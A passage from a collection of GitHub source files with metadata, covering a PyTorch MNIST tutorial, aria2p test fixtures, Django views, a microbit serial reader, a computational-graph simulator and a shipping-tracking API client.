group_labels\n shuffled_df.to_csv(data_path / 'annotations.csv')\n\n # make directories for sets and set specific annotation files\n for group in ['train', 'val', 'test']:\n group_path = data_path / group\n group_path.mkdir(parents=True, exist_ok=True)\n shuffled_df[shuffled_df['group'].str.match(group)].to_csv(group_path / 'annotations.csv')\n\n # move each file into its groups' directory\n shuffled_df.apply(lambda x: shutil.move(str(data_path / x['np_file']), str(data_path / x['group'] / x['np_file'])), axis=1)", "repo_name": "markt/neuroIN", "sub_path": "src/neuroIN/preprocessing/train_test_split.py", "file_name": "train_test_split.py", "file_ext": "py", "file_size_in_byte": 2879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 45, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "7678119700", "text": "import numpy as np\nimport torch\n\nimport helper\n\nimport matplotlib.pyplot as plt\n\n# Setup the dataset\nfrom torchvision import datasets, transforms\n\n# Define a transform to normalize the data\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,)),\n ])\n\n# Download and load the training data\ntrainset = datasets.MNIST('~/.pytorch/MNIST_data/', download=True, train=True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=64, shuffle=True)\n\ndataiter = iter(trainloader)\nimages, labels = dataiter.next()\nprint(type(images))\nprint(images.shape)\nprint(labels.shape)\n\nplt.imshow(images[1].numpy().squeeze(), cmap='Greys_r');\n# plt.show()\n\n\n# Flatten image tensor\ninputs = images.view(images.shape[0], -1)\n\n# Network parameters\nW1 = torch.randn(784, 256)\nB1 = torch.randn(256)\n\nW2 = torch.randn(256, 10)\nB2 = torch.randn(10)\n\n# Network functions\ndef activation(x):\n return 1/(1+torch.exp(-x))\n\ndef softmax(x):\n # print(x.shape)\n # denominator = 0\n # softmax_x = []\n # for k in range (len(x)):\n # denominator += torch.exp(x[k])\n\n return torch.exp(x)/torch.sum(torch.exp(x), dim=1).view(-1, 1)\n\n# forward propagation\nhidden = activation(torch.mm(inputs, W1) + B1)\noutput = softmax(torch.mm(hidden, W2) + B2)\n\n# print(\"Shape should be (64, 10)\")\n# print(output.shape)\n# print(\"Output should sum to 1\")\n# print(output.sum(dim=1))\n\n# print(output)\n\n##################################\n# Building Networks with PyTorch #\n##################################\nfrom torch import nn\n\nclass Network(nn.Module):\n def __init__(self):\n super().__init__()\n\n # Inputs to hidden layer linear transformation\n # Weights and bias tensors are automatically created\n self.hidden = nn.Linear(784, 256)\n # Output layer, 10 units - one for each digit\n self.output = nn.Linear(256, 10)\n\n # Define sigmoid activation and softmax output\n self.sigmoid = nn.Sigmoid()\n self.softmax = nn.Softmax(dim=1) # dim=1 calculates softmax across columns\n\n def forward(self, x):\n # Pass the input tensor through each of our operations\n x = self.hidden(x)\n x = self.sigmoid(x)\n x = self.output(x)\n x = self.softmax(x)\n\n return x\n\n# model = Network()\n# print(model)\n\n##################################################\n# Create network with torch.nn.functional module #\n##################################################\n\nimport torch.nn.functional as F\n\nclass Network(nn.Module):\n def __init__(self):\n super().__init__()\n # Inputs to hidden layer linear transformation\n # Weights and bias tensors are automatically created\n self.hidden = nn.Linear(784, 256)\n # Output layer, 10 units - one for each digit\n self.output = nn.Linear(256, 10)\n\n def forward(self, x):\n # Hidden layer with sigmoid activation\n x = F.sigmoid(self.hidden(x))\n # Output layer with softmax activation\n x = F.softmax(self.output(x), dim=1)\n\n return x\n\n##################\n# Custom Network #\n##################\nclass Network(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.fc1 = nn.Linear(784, 128)\n self.fc2 = nn.Linear(128, 64)\n self.fc3 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = torch.sigmoid(self.fc1(x))\n x = torch.sigmoid(self.fc2(x))\n x = F.softmax(self.fc3(x), dim=1)\n\n return x\n\nmodel = Network()\n# print(model)\n\n# Set biases to all zeros\nmodel.fc1.bias.data.fill_(0)\n\n# Custom weight initialization\nmodel.fc1.weight.data.normal_(std=0.01)\n\n# Grab some data\ndataiter = iter(trainloader)\nimages, labels = dataiter.next()\n\n# Resize images into a 1D vector, new shape is\nimages.resize_(images.shape[0], 1, 784)\n\n# Forward pass through the network\nimg_idx = 0\nps = model.forward(images[img_idx,:])\n\nimg = images[img_idx]\nhelper.view_classify(img.view(1, 28, 28), ps)\n\n#######################\n# Using nn.Sequential #\n#######################\n\n# Hyperparameters\ninput_size = 784\nhidden_sizes = [128, 64]\noutput_size = 10\n\n# Build a feed-forward network\nmodel = nn.Sequential(nn.Linear(input_size, hidden_sizes[0]),\n nn.ReLU(),\n nn.Linear(hidden_sizes[0], hidden_sizes[1]),\n nn.ReLU(),\n nn.Linear(hidden_sizes[1], output_size),\n nn.Softmax(dim=1))\n\nprint(model)\n\n# Forward pass through the network and display output\nimages, labels = next(iter(trainloader))\nimages.resize_(images.shape[0], 1, 784)\nps = model.forward(images[0,:])\nhelper.view_classify(images[0].view(1, 28, 28), ps)\n", "repo_name": "LiamHz/deep-learning-pytorch", "sub_path": "intro-to-pytorch/NeuralNetworksWithPyTorch.py", "file_name": "NeuralNetworksWithPyTorch.py", "file_ext": "py", "file_size_in_byte": 4740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torchvision.transforms.Compose", "line_number": 12, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 12, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 12, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 101, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.functional.sigmoid", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 112, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 121, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.sigmoid", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 132, "usage_type": "name"}, {"api_name": "helper.view_classify", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "helper.view_classify", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "11751968618", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: basemodel.py\n Description:\n Author: GU Tianyi\n date: 2022/4/4\n desc:\n-------------------------------------------------\n\"\"\"\nimport logging\nimport os\nimport torch\nimport time\n\nclass BasicModel(torch.nn.Module):\n def __init__(self):\n \"\"\"\n 封装了nn.Module,主要是提供了save和load两个方法\n \"\"\"\n super(BasicModel, self).__init__()\n self.model_name = str(self.__class__.__name__)\n\n def load(self, path):\n \"\"\"\n 可加载指定路径的模型\n :param path: str (指定路径)\n :return:\n \"\"\"\n self.load_state_dict(torch.load(path))\n\n def save(self, name=None):\n \"\"\"\n 保存模型,默认使用“模型名字+时间”作为文件名\n :param name: str (模型参数)\n :return:\n \"\"\"\n if name is None:\n if not os.path.exists('./checkpoints'):\n os.makedirs('./checkpoints')\n prefix = 'checkpoints/' + self.model_name + '_'\n name = time.strftime(prefix + '%m%d_%H:%M:%S.pth')\n torch.save(self.state_dict(), name)", "repo_name": "gutianyi/nlp_arsenal", "sub_path": "dd_nlp_arsenal/nn/base/basemodel.py", "file_name": "basemodel.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 40, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "20606690100", "text": "\"\"\"Configuration for the pytest test suite.\"\"\"\n\nimport json\nimport os\nimport random\nimport subprocess\nimport sys\nimport time\nfrom pathlib import Path\n\nimport pytest\nimport requests\n\nfrom aria2p import API, Client, enable_logger\n\nfrom . import CONFIGS_DIR, SESSIONS_DIR\n\n\n@pytest.fixture(autouse=True)\ndef tests_logs(request):\n # put logs in tests/logs\n log_path = Path(\"tests\") / \"logs\"\n\n # tidy logs in subdirectories based on test module and class names\n module = request.module\n class_ = request.cls\n name = request.node.name + \".log\"\n\n if module:\n log_path /= module.__name__.replace(\"tests.\", \"\")\n if class_:\n log_path /= class_.__name__\n\n log_path.mkdir(parents=True, exist_ok=True)\n\n # append last part of the name and enable logger\n log_path /= name\n if log_path.exists():\n log_path.unlink()\n enable_logger(sink=log_path, level=os.environ.get(\"PYTEST_LOG_LEVEL\", \"TRACE\"))\n\n\ndef spawn_and_wait_server(port=8779):\n process = subprocess.Popen(\n [\n sys.executable,\n \"-m\",\n \"uvicorn\",\n \"tests.http_server:app\",\n \"--port\",\n str(port),\n ],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n )\n while True:\n try:\n requests.get(f\"http://localhost:{port}/1024\")\n except:\n time.sleep(0.1)\n else:\n break\n return process\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef http_server(tmp_path_factory, worker_id):\n if worker_id == \"master\":\n # single worker: just run the HTTP server\n process = spawn_and_wait_server()\n yield process\n process.kill()\n process.wait()\n return\n\n # get the temp directory shared by all workers\n root_tmp_dir = tmp_path_factory.getbasetemp().parent\n\n # try to get a lock\n lock = root_tmp_dir / \"lock\"\n try:\n lock.mkdir(exist_ok=False)\n except FileExistsError:\n yield # failed, don't run the HTTP server\n return\n\n # got the lock, run the HTTP server\n process = spawn_and_wait_server()\n yield process\n process.kill()\n process.wait()\n\n\nclass _Aria2Server:\n def __init__(self, tmp_dir, port, config=None, session=None, secret=\"\"):\n self.tmp_dir = tmp_dir\n self.port = port\n\n # create the command used to launch an aria2c process\n command = [\n \"aria2c\",\n f\"--dir={self.tmp_dir}\",\n \"--file-allocation=none\",\n \"--quiet\",\n \"--enable-rpc=true\",\n f\"--rpc-listen-port={self.port}\",\n ]\n if config:\n command.append(f\"--conf-path={config}\")\n else:\n # command.append(\"--no-conf\")\n config = CONFIGS_DIR / \"default.conf\"\n command.append(f\"--conf-path={config}\")\n if session:\n if isinstance(session, list):\n session_path = self.tmp_dir / \"_session.txt\"\n with open(session_path, \"w\") as stream:\n stream.write(\"\\n\".join(session))\n command.append(f\"--input-file={session_path}\")\n else:\n session_path = SESSIONS_DIR / session\n if not session_path.exists():\n raise ValueError(f\"no such session: {session}\")\n command.append(f\"--input-file={session_path}\")\n if secret:\n command.append(f\"--rpc-secret={secret}\")\n\n self.command = command\n self.process = None\n\n # create the client with port\n self.client = Client(port=self.port, secret=secret, timeout=20)\n\n # create the API instance\n self.api = API(self.client)\n\n def start(self):\n while True:\n # create the subprocess\n self.process = subprocess.Popen(self.command)\n\n # make sure the server is running\n retries = 5\n while retries:\n try:\n self.client.list_methods()\n except requests.ConnectionError:\n time.sleep(0.1)\n retries -= 1\n else:\n break\n\n if retries:\n break\n\n def wait(self):\n while True:\n try:\n self.process.wait()\n except subprocess.TimeoutExpired:\n pass\n else:\n break\n\n def terminate(self):\n self.process.terminate()\n self.wait()\n\n def kill(self):\n self.process.kill()\n self.wait()\n\n def rmdir(self, directory=None):\n if directory is None:\n directory = self.tmp_dir\n for item in directory.iterdir():\n if item.is_dir():\n self.rmdir(item)\n else:\n item.unlink()\n directory.rmdir()\n\n def destroy(self, force=False):\n if force:\n self.kill()\n else:\n self.terminate()\n self.rmdir()\n\n\nclass Aria2Server:\n def __init__(self, tmp_dir, port, config=None, session=None, secret=\"\"):\n self.server = _Aria2Server(tmp_dir, port, config, session, secret)\n\n def __enter__(self):\n self.server.start()\n return self.server\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.server.destroy(force=True)\n\n\nports_file = Path(\".ports.json\")\n\n\ndef get_lock():\n lockdir = Path(\".lockdir\")\n while True:\n try:\n lockdir.mkdir(exist_ok=False)\n except FileExistsError:\n time.sleep(0.025)\n else:\n break\n\n\ndef release_lock():\n Path(\".lockdir\").rmdir()\n\n\ndef get_random_port():\n return random.randint(15000, 16000)\n\n\ndef get_current_ports():\n try:\n return json.loads(ports_file.read_text())\n except FileNotFoundError:\n return []\n\n\ndef set_current_ports(ports):\n ports_file.write_text(json.dumps(ports))\n\n\ndef reserve_port():\n get_lock()\n\n ports = get_current_ports()\n port_number = get_random_port()\n while port_number in ports:\n port_number = get_random_port()\n ports.append(port_number)\n set_current_ports(ports)\n\n release_lock()\n return port_number\n\n\ndef release_port(port_number):\n get_lock()\n ports = get_current_ports()\n ports.remove(port_number)\n set_current_ports(ports)\n release_lock()\n\n\n@pytest.fixture\ndef port():\n port_number = reserve_port()\n yield port_number\n release_port(port_number)\n\n\n@pytest.fixture\ndef server(tmp_path, port):\n with Aria2Server(tmp_path, port) as server:\n yield server\n", "repo_name": "pawamoy/aria2p", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 6597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 420, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "aria2p.enable_logger", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 46, "usage_type": "attribute"}, {"api_name": "subprocess.DEVNULL", "line_number": 53, "usage_type": "attribute"}, {"api_name": "subprocess.DEVNULL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 58, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 66, "usage_type": "call"}, {"api_name": "aria2p.Client", "line_number": 132, "usage_type": "call"}, {"api_name": "aria2p.API", "line_number": 135, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 140, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 147, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 148, "usage_type": "call"}, {"api_name": "subprocess.TimeoutExpired", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 203, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 207, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 212, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 218, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 222, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 227, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 233, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 258, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 265, "usage_type": "attribute"}]} +{"seq_id": "19579610439", "text": "import serial\r\n#the port will depend on your computer\r\n#for a linux it will probably be /dev/ttyACM0\r\n#PORT = \"/dev/ttyACM0\"\r\n#for windows it will be COM(something), typically COM 6 or COM 11\r\nPORT = \"COM6\"\r\n\r\nBAUD = 115200\r\n\r\ns = serial.Serial(PORT)\r\ns.baudrate = BAUD\r\ns.parity = serial.PARITY_NONE\r\ns.databits = serial.EIGHTBITS\r\ns.stopbits = serial.STOPBITS_ONE\r\nnewList =[]\r\ntry:\r\n while True:\r\n #read a line from the microbit, decode it and strip the whitespace at the end\r\n data = s.readline().decode(\"ascii\").rstrip()\r\n \r\n #split the string into several substrings separated by \" \"\r\n data_s = data.split(\" \")\r\n #print(data_s)\r\n \r\n # get the first string\r\n message = data_s[0]\r\n #print(message)\r\n if message == \"Traceback\":\r\n break\r\n newList.append(message)\r\n print(\"Max length of my List is \",newList[len(newList)-1])\r\nfinally:\r\n s.close()\r\n", "repo_name": "abinalex22/Algorithm", "sub_path": "chronometer/maxListSupporttedSerialPort.py", "file_name": "maxListSupporttedSerialPort.py", "file_ext": "py", "file_size_in_byte": 955, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "serial.Serial", "line_number": 10, "usage_type": "call"}, {"api_name": "serial.PARITY_NONE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 13, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "34755385255", "text": "from pydeeptoy.computational_graph import *\nfrom itertools import takewhile\nfrom itertools import chain\n\n\nclass SimulationContext:\n def __init__(self):\n self.data_bag = dict()\n\n def get_data(self, key):\n if key not in self.data_bag:\n self.data_bag[key] = ConnectionData(value=key.init_value)\n\n return self.data_bag[key]\n\n def __getitem__(self, key):\n return self.get_data(key)\n\n def __setitem__(self, key, value):\n self.data_bag[key] = value\n\n @staticmethod\n def sort_topologically(cg: ComputationalGraph, out=list()):\n sorted_nodes = []\n\n def depth_first_search(on_vertex_finished):\n discovered = dict()\n finished = dict()\n\n def visit(vertex, time):\n time += 1\n discovered[vertex] = time\n\n for v in cg.get_adjacent_in_nodes(vertex):\n if v not in discovered:\n time = visit(v, time)\n\n time += 1\n finished[vertex] = time\n on_vertex_finished(time, vertex)\n return time\n\n time = 0\n root_nodes = chain.from_iterable([cg.adjacencyOutMap[c] for c in out]) if len(out) > 0 else cg.nodes\n for v in root_nodes:\n if v not in discovered:\n time = visit(v, time)\n\n depth_first_search(lambda time, node: sorted_nodes.insert(0, node))\n\n sorted_nodes.reverse()\n return sorted_nodes\n\n def forward(self, cg: ComputationalGraph, params=dict(), out=list()):\n for p, v in params.items():\n self.get_data(p).value = v\n\n for node in self.sort_topologically(cg, out):\n node.forward(self)\n\n def backward(self, cg: ComputationalGraph, reset_gradient=True, out=list()):\n if reset_gradient:\n for i in cg.outputs:\n self.get_data(i).reset_gradient(to_value=1)\n [node.backward(self) for node in reversed(self.sort_topologically(cg))]\n\n def forward_backward(self, cg: ComputationalGraph, params=dict(), reset_gradient=True, out=list()):\n self.forward(cg, params, out=out)\n self.backward(cg, reset_gradient=reset_gradient, out=out)\n\n\n", "repo_name": "stormy-ua/DeepLearningToy", "sub_path": "src/pydeeptoy/simulation.py", "file_name": "simulation.py", "file_ext": "py", "file_size_in_byte": 2244, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "itertools.chain.from_iterable", "line_number": 44, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "72489670914", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render,redirect\nfrom .models import Skill,Project\n\n# Create your views here.\nclass SkillsViews(object):\n\t\"\"\"docstring for SkillsViews\"\"\"\n\t@staticmethod\n\tdef skills(request):\n\t\tskills = Skill.objects.all()\n\t\tprint(request.user)\n\t\tprint(request.user.is_staff)\n\t\tcontext = {\n\t\t\t\"title\":\"Skills\",\n\t\t\t\"skills\":skills\n\t\t\t}\n\t\treturn render(request,\"skills.html\",context)\n\t\n\t@staticmethod\n\tdef show_projects(request):\n\t\tprojects = Project.objects.all()\n\t\tnew_projects = []\n\t\tfor i in range(len(projects)):\n\t\t\tnew_projects.append({\"instance\":projects[i],\"result\":i % 2 == 0})\n\t\tprint(new_projects[0]['instance'].get_url())\n\n\t\tcontext ={\n\t\t\t\"title\":\"Projects\",\n\t\t\t\"projects\": new_projects\n\n\t\t}\n\t\treturn render(request, \"projects.html\",context)\n\t@staticmethod\n\tdef get_project(request,id):\n\t\tproject = Project.objects.get(id=int(id))\n\t\tcontext ={\n\t\t\t\"title\":\"Project\",\n\t\t\t\"project\": project\n\n\t\t}\n\t\t\n\t\treturn render(request, \"project.html\",context)\n\n\t@staticmethod\n\tdef form_sessions(request):\n\t\tcontext = {\n\t\t\t'title':'examp'\n\t\t}\n\t\treturn render(request,\"sessions_example.html\",context)\n\n\t@staticmethod\n\tdef add_sessions(request):\n\t\tprint(request.session['some_text'])\n\t\tleadboard = request.session.get(\"leadboard\",[])\n\t\tleadboard += [{'name':request.GET.get(\"name\",\"\"),\"score\":0}]\n\t\trequest.session.update({\"leadboard\":leadboard})\n\n\t\treturn redirect(\"skills:form\")\n\n[{'name':'peter',\"score\":0}] + [{'name':'peter',\"score\":0}] == [{'name':'peter',\"score\":0},{'name':'peter',\"score\":0}] \n", "repo_name": "Lairion/MainAcadProg", "sub_path": "skills/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1570, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.Skill.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Skill.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Skill", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Project.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 23, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Project.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Project.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Project", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 44, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "3611216298", "text": "import json\nimport time\nimport importlib\nimport requests\nfrom hashlib import sha256, md5\nfrom flask_babel import gettext as _\nfrom app.helpers import log_info\nfrom app.models.sys import SysSetting\nfrom app.models.shipping import Shipping\nfrom app.exception import ShippingException\n\n\nclass TrackServiceFactory(object):\n \"\"\"物流查询工厂类\"\"\"\n\n @staticmethod\n def get_trackservice():\n vendor = SysSetting.query.filter(\n SysSetting.key == 'shipping_vendor').first()\n if vendor is None:\n raise ShippingException(_(u'快递配置查询不存在'))\n TrackClassService = vendor.value\n mod = importlib.import_module(__name__)\n return getattr(mod, TrackClassService)()\n\n\nclass TrackService(object):\n \"\"\" 物流查询 \"\"\"\n\n def __init__(self):\n # 快递id\n self.shipping_id = 0\n\n # 快递单号\n self.shipping_sn = ''\n\n # config_key\n self.config_key = ''\n\n # 快递信息\n self.shipping = None\n\n # 快递服务配置\n self.config = None\n\n # 快递查询接口url\n self.apiurl = ''\n\n # 收件人电话\n self.receive_phone = ''\n\n def _init_(self):\n \"\"\"加载快递信息\"\"\"\n self.shipping = Shipping.query.get(self.shipping_id)\n if self.shipping is None:\n raise ShippingException(_(u'快递id不存在'))\n\n config = SysSetting.query.filter(\n SysSetting.key == self.config_key).first()\n if config is None:\n raise ShippingException(_(u'快递配置不存在'))\n try:\n self.shipping_config = json.loads(config.value)\n except Exception as e:\n raise ShippingException(e)\n\n def _get_track_response(self):\n \"\"\"获取跟踪数据\"\"\"\n try:\n self._init_()\n self._check_req_params()\n data = self._get_req_params()\n\n except ShippingException as e:\n raise e\n\n try:\n res = requests.post(self.apiurl, data, timeout=10)\n except Exception as e:\n log_info('[TrackService] [Error] NetWorkException. %s, %s' % (self.apiurl, data))\n raise ShippingException(_(u'查询失败,网络异常!'))\n\n res.encoding = 'utf-8'\n if res.status_code != 200:\n raise ShippingException(u'查询失败,网络状态为%d' % res.status_code)\n return res\n\n def _check_req_params(self):\n \"\"\"检查请求参数\"\"\"\n if self.shipping_sn is None:\n raise ShippingException(_(u'缺少快递单号'))\n\n # 快递分单则默认查询首个订单号\n _temp_sn_list = self.shipping_sn.split()\n if _temp_sn_list is not None and len(_temp_sn_list) >= 2:\n self.shipping_sn = _temp_sn_list[0]\n\n def _get_req_params(self):\n \"\"\"获取请求参数,子类实现\"\"\"\n pass\n\n def track(self, shipping_id, shipping_sn, receive_phone):\n \"\"\" 快递查询数据,子类重载 \"\"\"\n pass\n\n\nclass Shipping100TrackService(TrackService):\n \"\"\" 快递100物流查询 \"\"\"\n def __init__(self):\n TrackService.__init__(self)\n self.config_key = 'config_shipping'\n self.apiurl = 'https://poll.kuaidi100.com/poll/query.do'\n\n def _get_req_params(self):\n params = {\n 'com': self.shipping.shipping_code,\n 'num': self.shipping_sn,\n }\n\n # 拼接字符串后MD5加密,字符串转大写\n conf = self.shipping_config\n json_params = json.dumps(params)\n temp_sign = u'%s%s%s' % (json_params, conf['key'], conf['customer'])\n sign = md5(temp_sign.encode('utf-8')).hexdigest()\n sign = sign.upper()\n\n # 请求接口参数\n return {\n 'customer': conf['customer'],\n 'param': json_params,\n 'sign': sign\n }\n\n def track(self, shipping_id, shipping_sn, receive_phone=''):\n \"\"\" 查询 \"\"\"\n self.shipping_id = shipping_id\n self.shipping_sn = shipping_sn\n try:\n res = self._get_track_response()\n except ShippingException as e:\n log_info(u'[Shipping100TrackService] [Error] shipping_code:%s, shipping_sn:%s, ShippingException:%s' % (self.shipping.shipping_code, self.shipping_sn, e))\n raise e\n\n resjson = res.json()\n if resjson['message'] != 'ok':\n log_info(u'[Shipping100TrackService] [Error] shipping_code:%s, shipping_sn:%s, response message:%s' % 